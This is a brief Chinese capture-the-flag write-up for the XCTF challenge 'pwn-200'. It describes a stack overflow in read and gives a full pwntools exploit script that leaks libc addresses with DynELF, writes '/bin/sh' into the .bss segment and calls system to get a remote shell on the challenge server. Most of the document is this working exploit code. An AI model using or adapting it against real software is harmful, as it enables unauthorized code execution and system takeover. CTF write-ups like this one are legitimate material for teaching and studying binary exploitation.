pwn-200

题目连接 https://adworld.xctf.org.cn/media/task/attachments/49bd95c78386423997fa044a9e750015

 

借鉴

https://www.cnblogs.com/deerCode/p/11919638.html

https://blog.csdn.net/qq_43986365/article/details/95752798

 

read存在栈溢出

 没有libc，也没有后门函数可以直接调用

用DynELF泄露出system地址，在bss段写入/bin/sh，用pppt来调用read执行system

exp如下

from  pwn import *
r=remote('111.198.29.45',53833)

elf=ELF('pwn-200')
write_plt=elf.plt['write']
read_plt=elf.plt['read']
start_addr=0x80483d0
func_addr=0x08048484
ppp_addr=0x080485cd

def leak(addr):
        payload1='a'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(addr)+p32(4)
        r.sendline(payload1)
        data=r.recv(4)
        return data

print r.recv()
d=DynELF(leak,elf=elf)
sys_addr=d.lookup('system','libc')
payload2='a'*112+p32(start_addr)
r.sendline(payload2)
print r.recv()

bss_addr=elf.bss()
payload3='a'*112+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)
payload3+=p32(sys_addr)+p32(func_addr)+p32(bss_addr)

r.sendline(payload3)
r.sendline('/bin/sh')
r.interactive()